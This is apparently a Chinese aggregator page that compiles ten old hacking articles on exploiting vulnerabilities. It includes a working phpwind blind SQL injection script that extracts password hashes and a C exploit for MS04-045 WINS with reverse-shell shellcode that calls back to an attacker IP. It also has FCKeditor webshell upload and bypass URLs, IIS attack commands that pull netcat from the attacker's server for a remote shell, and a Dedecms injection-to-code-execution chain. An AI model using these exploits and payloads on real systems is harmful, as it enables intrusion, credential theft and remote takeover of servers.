您现在的位置：首页 > 实用文 > 其他范文

Visual C++漏洞利用的一个Tips

时间：2023-09-27 08:52:26 其他范文收藏本文下载本文

下面是小编为大家整理的Visual C++漏洞利用的一个Tips，本文共10篇，供大家参考借鉴，希望可以帮助您。

篇1：Visual C++漏洞利用的一个Tips

tombkeeper的和谐Blog

假设有一个Visual C++的漏洞，或者一个可以通过Visual C++触发的漏洞，但是在具体利用的时候不同版本的Visual C++需要区别对待，这时候如何做到通用呢？借助于_MSC_VER这个预定义宏可以很容易地做到：

// VC 6

#if defined(_MSC_VER) && _MSC_VER == 1200

pia pia

#endif

// VC 及其以上版本

#if defined(_MSC_VER) && _MSC_VER >= 1400

biu biu

#endif

篇2：fckeditor漏洞利用

网络

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp

可以自定义文件夹名称上传图片木马，利用路径解析漏洞，也可以直接上传ASP木马，

fckeditor漏洞利用

，

如果是ASPX的就将/asp/connector.asp后缀改为ASPX

Type=Image这个变量是我们自己定义的。比如：

fckeditor/editor/filemanager/browser/default/browser.html?Type=xiaosei&Connector=connectors/asp/connector.asp

篇3：phpwind Exp 漏洞利用

作者：字体：[增加减小] 类型：转载

忘记什么时候我就拿到了,一直没发挥.由于某些原因一直没发出来,毕竟不是原创,现在有人帖出来了,我也放出来.

程序代码

print_r(“

+------------------------------------------------------------------+

Exploit For Phpwind 5.X Version

BY Loveshell

Just For Fun :)

+------------------------------------------------------------------+

”);

ini_set(“max_execution_time”,0);

error_reporting(7);

$bbspath=“$argv[2]”;

$server=“$argv[1]”;

$cookie=‘1ae40_lastfid=0; 1ae40_ol_offset=776; 1ae40_ck_info=%2F%09.72m.net; 1ae40_winduser=A1QKBgE9UFxUUwAHDloFUAMIAFxeUgIMWgFUVVYDAA8HBFQNUVA%3D; 1ae40_lastvisit=0%091173612527%09%2Fbbs%2Findex.php%3F;

$useragent=“Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”;

$uid=intval($argv[3])>0 ? intval($argv[3]):1;

echo “\r\n#Logging\t........”;

if(islogin) echo “Login Ok!\r\n”;

else die(“Not Login!\tCheck Your Cookie and Useragent!\r\n”);

echo “#Testing\t........”;

if(test()) echo “Vul!\r\n”;

else die(“Not Vul”);

$hashtable=‘0123456789abcdef‘;

$count=0;

echo “#Cracking\t\r\n\r\n”;

for($i=1;$i<=16;$i++){

echo “第\t$i\t位:”;

$subpass=crack($i+8);

$password=$password.$subpass;

echo “$subpass\r\n”;

}

echo “Password:\t$password”;

echo “\r\nGood Luck $count Times\r\n”;

function send($cmd,$path)

{

global $bbspath,$server,$cookie,$count,$useragent,$debug,$evilip;

$path=$bbspath.“$path”;

$message = “POST ”.$path.“ HTTP/1.1\r\n”;

$message .= “Accept: */*\r\n”;

$message .= “Accept-Language: zh-cn\r\n”;

$message .= “Referer: ”.$server.$path.“\r\n”;

$message .= “Content-Type: application/x-www-form-urlencoded\r\n”;

$message .= “User-Agent: ”.$useragent.“\r\n”;

$message .= “Host: ”.$server.“\r\n”;

$message .= “Content-length: ”.strlen($cmd).“\r\n”;

$message .= “Connection: Keep-Alive\r\n”;

$message .= “Cookie: ”.$cookie.“\r\n”;

$message .= “\r\n”;

$message .= $cmd.“\r\n”;

$count=$count+1;

$fd = fsockopen( $server, 80 );

fputs($fd,$message);

$resp = “

”;

while($fd&&!feof($fd)) {

$resp .= fread($fd,1024);

}

fclose($fd);

$resp .=“

”;

if($debug) {echo $cmd;echo $resp;}

// echo $resp;

return $resp;

}

function sqlject($sql){

global $uid;

$data=‘action=pubmsg&readmsg=0)‘;

$data=$data.“ union select BENCHMARK(1000000,md5(12345)) from pw_members where uid=$uid and $sql”.‘/*‘;

$echo=send($data,‘message.php‘);

preg_match(“/Total (.*)\(/i”,$echo,$matches);

if($matches[1]>2) return 1;

else return 0;

}

function test(){

global $uid;

$data=‘action=pubmsg&readmsg=0)‘;

$echo=send($data,‘message.php‘);

if(strpos($echo,‘MySQL Server Error‘)) return 1;

else return 0;

}

function islogin(){

global $uid;

$data=‘action=pubmsg&readmsg=0)‘;

$echo=send($data,‘message.php‘);

if(strpos($echo,‘login.php“‘)) return 0;

else return 1;

}

function crack($i){

global $hashtable;

$sql=”mid(password,$i,1)>0x“.bin2hex(‘8‘);

if(sqlject($sql)){

$a=8;

$b=15;}

else {

$a=0;

$b=8;

}

for($tmp=$a;$tmp<=$b;$tmp++){

$sql=”mid(password,$i,1)=0x“.bin2hex($hashtable[$tmp]);

if(sqlject($sql)) return $hashtable[$tmp];

}

crack($i);

}

点击下载此文件

篇4：fckeditor漏洞利用漏洞预警

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp

可以自定义文件夹名称上传图片木马，利用路径解析漏洞，也可以直接上传ASP木马，

fckeditor漏洞利用漏洞预警

，

如果是ASPX的就将/asp/connector.asp后缀改为ASPX

Type=Image这个变量是我们自己定义的。比如：

fckeditor/editor/filemanager/browser/default/browser.html?Type=xiaosei&Connector=connectors/asp/connector.asp

篇5：MS04045漏洞利用程序

此程序是针对MS最新的漏洞MS04045的攻击程序，我没有测试，

它需要再UNIX/LINUX等系统编译运行，或者利用CYGWIN。

上面的目标机是针对英文版或者法语版的。

目标机开了TCP42端口可能受影响。

代码如下：

#include

char shellcode[] =

”\xeb\x25\xe9\xfa\x99\xd3\x77\xf6\x02\x06\x6c\x59\x6c\x59\xf8“

”\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\x57\x53\x32\x5f“

”\x33\x32\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d“

”\x83\xed\x2c\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c“

”\xad\x8b\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01“

”\xfb\x8b\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b“

”\x5b\x20\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe“

”\xac\x31\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\x45\x09\x8d\x44“

”\x45\x08\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\x58\x5e\x56\x50“

”\x52\x2b\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\x88\x01\xf8\x0f“

”\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09\x75\xbe\xfe\x4d\x08“

”\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0\x89\xc7\x6a\x02“

”\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x50\x8b\x45\x04\x35“

”\x93\x93\x93\x93\x89\x45\x04\x66\x8b\x45\x02\x66\x35\x93\x93“

”\x66\x89\x45\x02\x58\x89\xce\x31\xdb\x53\x53\x53\x53\x56\x46“

”\x56\xff\xd0\x89\xc7\x55\x58\x66\x89\x30\x6a\x10\x55\x57\xff“

”\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8\x55\x55\xff\x55\xec\x8d“

”\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65\x68\x5c\x63\x6d\x64“

”\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57\x53\x53\xfe\xca\x01“

”\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88\x50\xb1\x08\x53\x53“

”\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff\x55\xf0\x6a\xff\xff“

”\x55\xe4“;

char mess[] =

”\x00\x03\x0d\x4c\x77\x77\xFF\x77\x05\x4e\x00\x3c\x01\x02\x03\x04“

// ”\x00\x03\x0d\x4c\x77\x77\xFF\x77\x05\x4e\x00\x3c\x01\x02\x03\x04“

”\x6c\xf4\x3d\x05\x00\x02\x4e\x05\x00\x02\x4e\x05\x00\x02\x4e\x05\x00\x02\

x4e\x05\x00\x02\x4e\x05\x00\x02\x4e\x05\x00\x02\x4e\x05\x00\x02\x4e\x05“;

char rep[] =

”\x90\x01\x4e\x05\x90\x00\x4e\x05\x90\x00\x4e\x05\x90\x00\x4e\x05\x90\x00\

x4e\x05\x90\x00\x4e\x05\x90\x00\x4e\x05\x90\x03\x4e\x05\x90\x00\x4e\x05“;

void usage;

int main(int argc, char *argv[])

{

int i,sock,sock2,sock3,addr,len=16;

int rc;

unsigned long XORIP = 0x93939393;

unsigned short XORPORT = 0x9393;

int cbport;

long cbip;

struct sockaddr_in mytcp;

struct hostent * hp;

if(argc<4 || argc>4)

usage();

cbport = htons(atoi(argv[3]));

cbip = inet_addr(argv[2]);

cbport ^= XORPORT;

cbip ^= XORIP;

memcpy(&shellcode[2],&cbport,2);

memcpy(&shellcode[4],&cbip,4);

char mess2[00];

memset(mess2,0,sizeof(mess2));

char mess3[210000];

memset(mess3,0,sizeof(mess3));

int ir;

for(ir =0;ir<200000;ir++)mess2[ir]='\x90';

memcpy(mess3,mess,sizeof(mess)-1);

int r=0;int le=sizeof(mess)-1;

for(r;r<30;r++)

{

memcpy(mess3+le,rep,sizeof(rep)-1);

le+=sizeof(rep)-1;

}

memcpy(mess3+le,mess2,200000);

memcpy(mess3+le+198000,shellcode,sizeof(shellcode));

int lenr=le+200000+sizeof(shellcode);

hp = gethostbyname(argv[1]);

addr = inet_addr(argv[1]);

sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

if (!sock)

{

//printf(”socket() error...\n“);

exit(-1);

}

mytcp.sin_addr.s_addr = addr;

mytcp.sin_family = AF_INET;

mytcp.sin_port=htons(42);

printf(”[*] connecting the target\n“);

rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct

sockaddr_in));

printf(”[*] sending exploit\n“);

send(sock,mess3,lenr,0);

printf(”[*] exploit sent\n“);

sleep(5);

shutdown(sock,1);

close(sock);

shutdown(sock,2);

close(sock2);

shutdown(sock,3);

close(sock3);

exit(0);

}

void usage()

{

unsigned int a;

printf(”\nUsage: \n“);

printf(”Sample: ZUC-WINShit www.vulnwins.com 31.33.7.23 31337\n\n“);

exit(0);

}

xiaohuar

篇6：IIS漏洞分析及漏洞利用

13个IIS漏洞分析及漏洞利用-Null.htw、ISM.DLL等

去年下半年关于IIS的漏洞层出不穷，鉴于目前IIS的广泛使用，觉得有必要把收集的资料加以总结一下，

1．介绍

这里介绍的方法主要通过端口80来完成操作，具有很大的威胁性，因为作为网络服务器80端口总要打开的。如果想方便一些，下载一些WWW、CGI扫描器来辅助检查。

而且要知道目标机器运行的是何种服务程序，你可以使用以下命令：

telnet 《目标机》 80

GET HEAD / HTTP/1.0

就可以返回一些域名和WEB服务程序版本，如果有些服务器把WEB服务运行在8080，81，8000，8001口，你就TELNET相应的口上。

2．常见漏洞

（1）、Null.htw

IIS如果运行了Index Server就包含了一个通过Null.htw有关的漏洞，即服务器上不存在此.htw结尾的文件。这个漏洞会导致显示ASP脚本的源代码， global.asa里面包含了用户帐户等敏感信息。如果攻击者提供特殊的URL请求给IIS就可以跳出虚拟目录的限制，进行逻辑分区和ROOT目录的访问。而这个”hit-highlighting“功能在Index Server中没有充分防止各种类型文件的请求，所以导致攻击者访问服务器上的任意文件。Null.htw功能可以从用户输入中获得3个变量：

CiWebhitsfile

CiRestriction

CiHiliteType

你可通过下列方法传递变量来获得如default.asp的源代码：

www.目标机.com/null.htw?CiWebhitsfile=/default.asp%20&%20

CiRestriction=none%20&%20&CiHiliteType=full其中不需要一个合法的.htw文件是因为虚拟文件已经存储在内存中了。

（2）、MDAC- 执行本地命令漏洞

这个漏洞出现得比较早，但在全球范围内，可能还有好多IIS WEB服务器存在这个漏洞，就像在今天，还有很多人在用Windows3.2一样。IIS的MDAC组件存在一个漏洞，可以导致攻击者远程执行目标系统的命令。主要核心问题是存在于RDSDatafactory，默认情况下，它允许远程命令发送到IIS服务器中，这命令会以设备用户的身份运行，在默认情况下是SYSTEM用户。我们可以通过以下办法测试本机是否存在这个漏洞：

c:\》nc -nw -w 2 《目标机》 80

GET /msadc/msadcs.dll HTTP

如果你得到下面的信息：

application/x_varg

就很有可能存在此漏洞且没有打上补丁，你可以使用rain forest puppy网站的两个程序进行测（www.wiretrip.net/rfp）==》mdac.pl和msadc2.pl。

（3）、ASP Dot Bug

这个漏洞出现得比较早了，是Lopht小组在发现的缺陷，这个漏洞也是泄露ASP源代码给攻击者，一般在IIS3.0上存在此漏洞，在请求的URL结尾追加一个或者多个点导致泄露ASP源代码，

www.目标机.com/sample.asp.

（4）、idc & .ida Bugs

这个漏洞实际上类似ASP dot 漏洞，其能在IIS4.0上显示其WEB目录信息，很奇怪有些人还在IIS5.0上发现过此类漏洞，通过增加?idc?或者?ida?后缀到URL会导致IIS尝试允许通过数据库连接程序.DLL来运行.IDC，如果此.idc不存在，它就返回一些信息给客户端。

www.目标机.com/anything.idc 或者 anything.idq

（5）、+.htr Bug

这个漏洞是由NSFOCUS发现的，对有些ASA和ASP追加+.htr的URL请求就会导致文件源代码的泄露： www.目标机.com/global.asa+.htr

（6）、NT Site Server Adsamples 漏洞

通过请求site.csc，一般保存在/adsamples/config/site.csc中，攻击者可能获得一些如数据库中的DSN，UID和PASS的一些信息，如：

www.目标机.com/adsamples/config/site.csc

（7）、IIS HACK

有人发现了一个IIS4.0的缓冲溢出漏洞，可以允许用户上载程序，如上载netcat到目标服务器，并把cmd.exe绑定到80端口。这个缓冲溢出主要存在于.htr,.idc和.stm文件中，其对关于这些文件的URL请求没有对名字进行充分的边界检查，导致运行攻击者插入一些后门程序在系统中下载和执行程序。要检测这样的站点你需要两个文件iishack.exe，ncx.exe，你可以到站点www.technotronic.com中去下载，另外你还需要一台自己的WEB服务器，也可以是虚拟服务器哦。你现在你自己的WEB服务器上运行WEB服务程序并把ncx.exe放到你自己相应的目录下，然后使用iishack.exe来检查目标机器：

c:\》iishack.exe 《目标机》 80 《你的WEB服务器》/ncx.exe

然后你就使用netcat来连接你要检测的服务器：

c:\》nc 《目标机》 80

如果溢出点正确，你就可以看到目标机器的命令行提示，并且是远程管理权限。Codebrws.asp & Showcode.asp 。Codebrws.asp和Showcode.asp在IIS4.0中是附带的看文件的程序，但不是默认安装的，这个查看器是在管理员允许查看样例文件作为联系的情况下安装的。但是，这个查看器并没有很好地限制所访问的文件，远程攻击者可以利用这个漏洞来查看目标机器上的任意文件内容，但要注意以下几点：

1．Codebrws.asp 和 Showcode.asp默认情况下不安装。 2．漏洞仅允许查看文件内容。 3．这个漏洞不能绕过WINDOWS NT的ACL控制列表的限制。 4．只允许同一分区下的文件可以被查看（所以把IIS目录和WINNT分区安装是个不错的方案，这样也可能比较好的防止最新的IIS5.0的unicode漏洞）.

5．攻击者需要知道请求的文件名。

例如你发现存在这个文件并符合上面的要求，你可以请求如下的命令：

篇7：ms04006漏洞利用挑战

袁哥

微软说此漏洞winntwin2k下拒绝服务都不能，win下只能拒绝服务不能利用，只能说他们不懂溢出，

挑战：

1、写出winntwin2kwin2003下的稳定利用。

2、写出有防火墙的稳定利用。防火墙只开了tcp42，不准许外联，不能影响原有wins服务。

写出1和2的愿意来公司应聘的可以发简历过来。

漏洞代码如下：

0:000>uf wins!getname

wins!GetName:

01011d38 55 push ebp

01011d39 8bec mov ebp,esp

01011d3b 8b4508 mov eax,dword ptr [ebp+8]

01011d3e 53 push ebx

01011d3f 56 push esi

01011d40 8b7510 mov esi,dword ptr [ebp+10h]

01011d43 8b00 mov eax,dword ptr [eax]

01011d45 33db xor ebx,ebx

01011d47 891e mov dword ptr [esi],ebx

01011d49 57 push edi

01011d4a 0fb608 movzx ecx,byte ptr [eax]

01011d4d 8bd1 mov edx,ecx

01011d4f 81e2c0000000 and edx,0C0h

01011d55 895510 mov dword ptr [ebp+10h],edx

01011d58 0f8589000000 jne wins!GetName+0xaf (01011de7)

wins!GetName+0x26:

01011d5e 83e13f and ecx,3Fh

01011d61 40 inc eax

01011d62 3bcb cmp ecx,ebx

01011d64 894d10 mov dword ptr [ebp+10h],ecx

01011d67 7e28 jle wins!GetName+0x59 (01011d91)

wins!GetName+0x31:

01011d69 8b7d0c mov edi,dword ptr [ebp+0Ch]

01011d6c 8d5101 lea edx,[ecx+1]

01011d6f d1ea shr edx,1

wins!GetName+0x39:

01011d71 8a08 mov cl,byte ptr [eax]

01011d73 8a5801 mov bl,byte ptr [eax+1]

01011d76 80e941 sub cl,41h

01011d79 40 inc eax

01011d7a 836d1002 sub dword ptr [ebp+10h],2

01011d7e 80eb41 sub bl,41h

01011d81 c0e104 shl cl,4

01011d84 0ad9 or bl,cl

01011d86 881f mov byte ptr [edi],bl

01011d88 47 inc edi

01011d89 40 inc eax

01011d8a ff06 inc dword ptr [esi]

01011d8c 4a dec edx

01011d8d 75e2 jne wins!GetName+0x39 (01011d71)

wins!GetName+0x57:

01011d8f eb03 jmp wins!GetName+0x5c (01011d94)

wins!GetName+0x59:

01011d91 8b7d0c mov edi,dword ptr [ebp+0Ch]

wins!GetName+0x5c:

01011d94 b901010000 mov ecx,101h

01011d99 2b4d10 sub ecx,dword ptr [ebp+10h]

wins!GetName+0x64:

01011d9c 33db xor ebx,ebx

01011d9e 3818 cmp byte ptr [eax],bl

01011da0 7434 je wins!GetName+0x9e (01011dd6)

wins!GetName+0x6a:

01011da2 813eef000000 cmp dword ptr [esi],0EFh

01011da8 773d ja wins!GetName+0xaf (01011de7)

wins!GetName+0x72:

01011daa 49 dec ecx

01011dab 3bcb cmp ecx,ebx

01011dad 7e38 jle wins!GetName+0xaf (01011de7)

wins!GetName+0x77:

01011daf c6072e mov byte ptr [edi],2Eh

01011db2 47 inc edi

01011db3 ff06 inc dword ptr [esi]

01011db5 8a10 mov dl,byte ptr [eax]

01011db7 83e23f and edx,3Fh

01011dba 2bca sub ecx,edx

01011dbc 3bcb cmp ecx,ebx

01011dbe 7e27 jle wins!GetName+0xaf (01011de7)

wins!GetName+0x88:

01011dc0 40 inc eax

01011dc1 8bda mov ebx,edx

01011dc3 4a dec edx

篇8：FCKeditor漏洞利用总结漏洞预警

Fckeditor漏洞利用总结

查看编辑器版本

FCKeditor/_whatsnew.html

—————————————————————————————————————————————————————————————

2. Version 2.2 版本

Apache+linux 环境下在上传文件后面加个.突破！测试通过，

—————————————————————————————————————————————————————————————

3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制，导致用户上传任意文件！将以下保存为html文件，修改action地址。

action=”www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media“ method=”post“>Upload a new file:

—————————————————————————————————————————————————————————————

4.FCKeditor 文件上传“.”变“_”下划线的绕过方法

很多时候上传的文件例如：shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。

4.1：提交shell.php+空格绕过

不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件未测试。

4.2：继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹，只检测了第一级的目录，如果跳到二级目录就不受限制。

—————————————————————————————————————————————————————————————

5. 突破建立文件夹

FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp

—————————————————————————————————————————————————————————————

6. FCKeditor 中test 文件的上传地址

FCKeditor/editor/filemanager/browser/default/connectors/test.html

FCKeditor/editor/filemanager/upload/test.html

FCKeditor/editor/filemanager/connectors/test.html

FCKeditor/editor/filemanager/connectors/uploadtest.html

—————————————————————————————————————————————————————————————

7.常用上传地址

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)

JSP 版：

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp

注意红色部分修改为FCKeditor 实际使用的脚本语言，蓝色部分可以自定义文

件夹名称也可以利用../..目录遍历，紫色部分为实际网站地址，

—————————————————————————————————————————————————————————————

8.其他上传地址

FCKeditor/_samples/default.html

FCKeditor/_samples/asp/sample01.asp

FCKeditor/_samples/asp/sample02.asp

FCKeditor/_samples/asp/sample03.asp

FCKeditor/_samples/asp/sample04.asp

一般很多站点都已删除_samples 目录，可以试试。

FCKeditor/editor/fckeditor.html 不可以上传文件，可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。

—————————————————————————————————————————————————————————————

9.列目录漏洞也可助找上传地址

Version 2.4.1 测试通过

修改CurrentFolder 参数使用 ../../来进入不同的目录

/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp

根据返回的XML 信息可以查看网站所有的目录。

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F

也可以直接浏览盘符：

JSP 版本：

FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F

—————————————————————————————————————————————————————————————

10.爆路径漏洞

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp

—————————————————————————————————————————————————————————————

11. FCKeditor 被动限制策略所导致的过滤不严问题

影响版本: FCKeditor x.x <= FCKeditor v2.4.3

脆弱描述：

FCKeditor v2.4.3 中File 类别默认拒绝上传类型：

html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm

Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName，而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!

而在apache 下，因为”Apache 文件名解析缺陷漏洞“也可以利用之，另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码，其限制最为狭隘。

在上传时遇见可直接上传脚本文件固然很好，但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过，也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!

篇9：Dedecms getip的漏洞利用

style=”display:block;padding:0px 10px;“ class=”ContentFont“>author: superhei

team:www.ph4nt0m.org

blog:superhei.blogbus.com

flyh4t在非安全发布了dedecms getip的注射漏洞，漏洞本身的成因没什么好说的老掉牙的X-Forwarded-For的问题，我想这个漏洞很多人都找到了，不过这个漏洞的利用有个地方还是可以说说的，可以直接得到shell：

在用户登陆后把用户信息写如了缓存：\include\inc_memberlogin.php

function FushCache($mid=0)

{

if(empty($mid)) $mid = $this->M_ID;

$dsql = new DedeSql();

$row = $dsql->GetOne(”Select ID,userid,pwd,type,uname,membertype,money,uptime,exptime,scores,newpm From #@__member where ID='{$mid}' “);

if(is_array($row))

{

$scrow = $dsql->GetOne(”Select titles From #@__scores where integral<={$row['scores']} order by integral desc“);

$row['honor'] = $scrow['titles'];

}

if(is_array($row)) return WriteUserInfos($mid,$row); //这里

else return '';

}

WriteUserInfos()的代码：

//写入用户的会话信息

function WriteUserInfos($uid,$row)

{

$tpath = ceil($uid/5000);

$ndir = dirname(__FILE__).”/cache/user/$tpath/“;

if(!is_dir($ndir)){

mkdir($ndir,0777);

chmod($ndir,0777);

}

$userfile = $ndir.$uid.'.php';

$infos = ”<“.”?php\r\n“;

$infos .= ”\$cfg_userinfos['wtime'] = '“.mytime().”';\r\n“;

foreach($row as $k=>$v){

if(ereg('[^0-9]',$k)){

$v = str_replace(”'“,”\\'“,$v); //这个是利用的关键 :)

$v = ereg_replace(”(<\?|\?>)“,”“,$v);

$infos .= ”\$cfg_userinfos['{$k}'] = '{$v}';\r\n“;

}

$infos .= ”\r\n?“.”>“;

@$fp = fopen($userfile,'w');

@flock($fp);

@fwrite($fp,$infos);

@fclose($fp);

return $infos;

}

我们构造$ipp=”121.11.11.1',uname=0x68656967655C273B706870696E666F28293B2F2F,uptime='1“;

mysql>select 0x68656967655C273B706870696E666F28293B2F2F;

+--------------------------------------------+

| 0x68656967655C273B706870696E666F28293B2F2F |

+--------------------------------------------+

| heige\';phpinfo();// |

+--------------------------------------------+

1 row in set (0.00 sec)

利用流程：

A：

else{ //成功登录

//$ipp=”121.11.11.1',uname=0x68656967655C273B706870696E666F28293B2F2F,uptime='1“;

$dsql->ExecuteNoneQuery(”update #@__member set logintime='“.mytime().”',loginip='“.$ipp.”' where ID='{$row['ID']}';“);

B：FushCache()

$row = $dsql->GetOne(”Select ID,userid,pwd,type,uname,membertype,money,uptime,exptime,scores,newpm From #@__member where ID='{$mid}' “);

C：WriteUserInfos()

heige\';phpinfo();// ---str_replace-->heige\\';phpinfo();//---fwrite--->heige\\';phpinfo();//

===>$cfg_userinfos['uname'] = 'heige\\';phpinfo();//'; 完美闭和前面的' :)

其中str_replace的部分相当于代码：

$v=”heige\';phpinfo();//“;

$v = str_replace(”'“,”\\'“,$v);

print $v;

整个过程其实就是一个很完整的”二次攻击“，而str_replace(”'“,”\\'",$v);起了关键性的作用 :)

[因为这个漏洞当我pc上有那么段时间了，这个文章很多都是凭记忆写的，可能有错误，有兴趣的同学可以自己跟一下，

Dedecms getip()的漏洞利用

，

]

篇10：反向shell和CVE2509漏洞利用

0×00 导言

在本文中，我们会简单介绍反向shell和CVE-2015-2509漏洞，最后详细介绍该漏洞的方法，

0×01 反向shell

所谓shell，大家并不陌生，无非就是一个命令行接口罢了。如果把它按平台分类的话，基本上大体可以分为两大类：针对web级别的和针对系统级别的。此外，按照连接方式，分为主动连接和被动连接，主动连接是Bind Shell，被动连接是Reverse Shell，也就是本文所说的反向shell，具体如后文所示。

下面我们来说说主动连接和被动连接的区别。Bind Shell是用户用BSAH，将shell绑定到一个本地端口上，这样任何人都可以在本地网络中发送命令。反向shell的工作方式是远程计算机将自己的shell发送给特定的用户，而不是将shell绑定到一个端口上。当远程机器处在防火墙等其它东西后面时，反向shell这种技术会变得非常有用。

许多时候，攻击者入侵了一台服务器后，他们会设置一个反向shell，将来他们就能通过这个shell轻松的访问这台远程计算机了，通俗的说，就是留了一个后门。

0×02

CVE-2015-2509漏洞该漏洞是在 Windows Media Center 中发现的，下面是引自微软公司对该漏洞的介绍：

· 如果 Windows Media Center 打开经特殊设计的引用恶意代码的Media Center link (.mcl)文件此漏洞可能允许远程执行代码。成功利用此漏洞的攻击者可以获得与当前用户相同的用户权限。与拥有管理用户权限的客户相比，帐户被配置为拥有较少系统用户权限的客户受到的影响更小。· 如果 Windows Media Center 打开引用了恶意代码的经特殊设计的Media Center 链接 (.mcl)文件则此漏洞可能允许远程执行代码。成功利用此漏洞的攻击者可以获得与当前用户相同的用户权限那帐户被配置为拥有较少用户权限的用户比具有管理用户权限的用户受到的影响要小。· 要利用此漏洞，攻击者必须诱使用户在本地计算机上安装 .mcl 文件。然后，可能从受攻击者控制的位置执行 .mcl 文件引用的恶意代码。此安全更新通过更正处理 Media Center 链接文件的方式来修复该漏洞。

好了，下面开始我们介绍该漏洞的具体利用方法。

0×03 搭建漏洞利用环境

下面是本文所要用到的一些必要工具：

• Virtualbox• Kali Linux，运行于Virtualbox之中• Windows 7系统，运行于Virtualbox之中

需要注意的是，在连接Kali 和Windows 7的时候，连接方式应该选择“Host Only Adapter”。

0×04 测试漏洞

若想测试该漏洞的话，只需要在Windows系统上打开记事本程序，然后输入下列内容：

然后，保存文件，注意，扩展名应该选择.mcl，也就是说类型为Media Center link (.mcl)文件。

图1：新建名为calc.mcl的文件

对于像作者这样的懒人来说，还有一个更省劲的方法，就是到exploit-db下载一个相应的Python脚本，然后运行它就能得到这个POC文件了，

好了，下面我们聊一聊具体步骤。

这个Python脚本的下载地址为： www.exploit-db.com/exploits/38151/